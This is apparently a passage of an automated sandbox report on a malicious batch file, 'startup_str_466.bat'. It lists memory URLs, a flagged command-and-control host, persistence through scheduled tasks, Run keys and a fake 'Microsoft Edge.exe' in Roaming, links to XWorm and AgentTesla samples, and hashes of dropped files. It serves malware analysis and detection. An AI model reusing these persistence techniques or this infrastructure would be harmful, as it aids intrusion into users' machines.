                          http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1864300587.000002752EAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1772363850.00000221717B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://ation.resoupowershell.exe, 00000012.00000002.2494306948.00000200C3272000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://go.microsoft.coMicrosoft Edge.exe, 00000019.00000002.3198445856.0000025946C68000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DCA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DDBAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200ABFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE7205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE6028000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://go.microMicrosoft Edge.exe, 00000019.00000002.2961235884.000002592F08A000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DCA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DDBAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200ABFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE7205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE6028000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.micom/pkiops/Docs/ry.htm0powershell.exe, 00000003.00000002.1778569949.0000022179CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1864300587.000002752EAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1772363850.00000221717B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://crl.micpowershell.exe, 0000000B.00000002.2027903424.000001B76DAF9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2235585515.00000298F4CF3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2811930482.000002CCFE4F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://ip-api.compowershell.exe, 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD93E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD93CA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crl.micft.cMicRosofpowershell.exe, 0000000B.00000002.2027903424.000001B76DAF9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2235585515.00000298F4CF3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2811930482.000002CCFE4F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1817404897.000002751E841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751121676.0000022161741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD78E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DC801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE5E01000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000019.00000002.2961235884.000002592E7F5000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000019.00000002.2961235884.000002592E80D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1817404897.000002751E841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751121676.0000022161741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD78E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DC801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE5E01000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000019.00000002.2961235884.000002592E7B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crl.microspowershell.exe, 00000015.00000002.2550329168.000002CCE5C37000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  208.95.112.1
                                                                  		ip-api.comUnited States
                                                                  		53334TUT-ASUSfalse
                                                                  147.185.221.24
                                                                  		product-hack.gl.at.ply.ggUnited States
                                                                  		12087SALSGIVERUStrue

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1586186
                                                                  Start date and time:2025-01-08 20:04:06 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 25s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:27
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Sample name:startup_str_466.bat
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.expl.evad.winBAT@33/35@2/2
                                                                  EGA Information:
                                                                  • Successful, ratio: 14.3%
                                                                  HCA Information:
                                                                  • Successful, ratio: 60%
                                                                  • Number of executed functions: 73
                                                                  • Number of non-executed functions: 11
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .bat

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 6816 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7340 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7476 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7516 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 7948 because it is empty
                                                                  • Execution Graph export aborted for target powershell.exe, PID 8040 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                  • VT rate limit hit for: startup_str_466.bat

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  14:05:00API Interceptor162x Sleep call for process: powershell.exe modified
                                                                  14:06:56API Interceptor17x Sleep call for process: Microsoft Edge.exe modified
                                                                  19:05:04Task SchedulerRun new task: RuntimeBroker_startup_533_str path: C:\Users\user\AppData\Roaming\startup_str_533.vbs
                                                                  19:06:55Task SchedulerRun new task: Microsoft Edge path: C:\Users\user\AppData\Roaming\Microsoft s>Edge.exe
                                                                  19:06:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Roaming\Microsoft Edge.exe
                                                                  19:07:06AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Edge C:\Users\user\AppData\Roaming\Microsoft Edge.exe
                                                                  19:07:16AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Edge.lnk

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  208.95.112.17dtpow.ps1Get hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  x.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  TR98760H.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                  • ip-api.com/json/?fields=225545
                                                                  test.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                  • ip-api.com/json/
                                                                  HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  1.exeGet hashmaliciousUnknownBrowse
                                                                  • ip-api.com/json/?fields=hosting,query
                                                                  1.exeGet hashmaliciousUnknownBrowse
                                                                  • ip-api.com/json/?fields=hosting,query
                                                                  YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  147.185.221.24Fixer.exeGet hashmaliciousRedLine, SheetRatBrowse
                                                                    Fixer.exeGet hashmaliciousRedLineBrowse
                                                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                        7fqul5Zr8Y.exeGet hashmaliciousUnknownBrowse
                                                                          loader.exeGet hashmaliciousUnknownBrowse
                                                                            loader.exeGet hashmaliciousUnknownBrowse
                                                                              P3A946MOFP.exeGet hashmaliciousXWormBrowse
                                                                                BootstrapperV1.16.exeGet hashmaliciousXWormBrowse
                                                                                  SharkHack.exeGet hashmaliciousXWormBrowse
                                                                                    avaydna.exeGet hashmaliciousNjratBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      ip-api.com7dtpow.ps1Get hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      x.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      TR98760H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                      • 208.95.112.1
                                                                                      test.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                      • 208.95.112.1
                                                                                      HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                      • 208.95.112.1
                                                                                      1.exeGet hashmaliciousUnknownBrowse
                                                                                      • 208.95.112.1
                                                                                      1.exeGet hashmaliciousUnknownBrowse
                                                                                      • 208.95.112.1
                                                                                      YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                      • 208.95.112.1
                                                                                      SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TUT-ASUS7dtpow.ps1Get hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      x.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      TR98760H.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                                      • 208.95.112.1
                                                                                      test.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                      • 208.95.112.1
                                                                                      HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                                      • 208.95.112.1
                                                                                      1.exeGet hashmaliciousUnknownBrowse
                                                                                      • 208.95.112.1
                                                                                      1.exeGet hashmaliciousUnknownBrowse
                                                                                      • 208.95.112.1
                                                                                      YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                      • 208.95.112.1
                                                                                      SAL987656700.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 208.95.112.1
                                                                                      SALSGIVERUSFixer.exeGet hashmaliciousRedLine, SheetRatBrowse
                                                                                      • 147.185.221.24
                                                                                      Fixer.exeGet hashmaliciousRedLineBrowse
                                                                                      • 147.185.221.24
                                                                                      spreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                      • 147.185.221.24
                                                                                      7fqul5Zr8Y.exeGet hashmaliciousUnknownBrowse
                                                                                      • 147.185.221.24
                                                                                      miori.arm.elfGet hashmaliciousUnknownBrowse
                                                                                      • 147.168.252.34
                                                                                      miori.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                      • 147.184.86.253
                                                                                      loader.exeGet hashmaliciousUnknownBrowse
                                                                                      • 147.185.221.24
                                                                                      loader.exeGet hashmaliciousUnknownBrowse
                                                                                      • 147.185.221.24
                                                                                      My33xbeYIX.exeGet hashmaliciousNjratBrowse
                                                                                      • 147.185.221.16
                                                                                      YPzNsfg4nR.exeGet hashmaliciousXWormBrowse
                                                                                      • 147.185.221.21

                                                                                      JA3 Fingerprints

                                                                                      No context

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Roaming\Microsoft Edge.exespreadmalware.exeGet hashmaliciousXWormBrowse
                                                                                        Uni.exeGet hashmaliciousUnknownBrowse
                                                                                          SplpM1fFkV.exeGet hashmaliciousUnknownBrowse
                                                                                            rPO767575.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                              Social_Security_Statement_Review.vbsGet hashmaliciousUnknownBrowse
                                                                                                Pollosappnuevo.batGet hashmaliciousXWormBrowse
                                                                                                  PollosAplicaccion.batGet hashmaliciousXWormBrowse
                                                                                                    gcapi64.cmdGet hashmaliciousUnknownBrowse
                                                                                                      fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                        fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dllGet hashmaliciousUnknownBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9434
                                                                                                          Entropy (8bit):4.928515784730612
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                          MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                          SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                          SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                          SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                          Malicious:false
                                                                                                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                          Malicious:false
                                                                                                          Preview:@...e...........................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:modified
                                                                                                          Size (bytes):85
                                                                                                          Entropy (8bit):4.816069990756076
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:rRSF1M4W3vWDt+kiEaKC5Sujg0a8G/Fsra:EFG4bwknaZ5Su3prra
                                                                                                          MD5:667C2CB8A126C43EBB2308D7878A727C
                                                                                                          SHA1:F379E071DA94737647A07A6C9CD6247CC4DB567D
                                                                                                          SHA-256:A96B7D3563A0243FFF24E7C066F5842E9C60245CBEE22114648EFD66AAE3EC81
                                                                                                          SHA-512:9832EA7A717B99CE5868EAF652142CCAE5137EAB6394AAFCC0B862F81A91C9C1D1766405516B10C2F6CFAF629E34C4D2DF90C99097FFD14333769419B0D711EF
                                                                                                          Malicious:false
                                                                                                          Preview:....### Administrator: C:\Users\user\AppData\Roaming\Microsoft Edge.exe ###..[WIN]r

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32xmqt4y.yns.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5l3djrl2.rcu.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4ghrwzv.am0.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dggu2acs.qf4.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evhggr4b.1zc.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f3chpyrb.bhz.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbs3nrsw.ad4.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fdww0baj.2gc.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
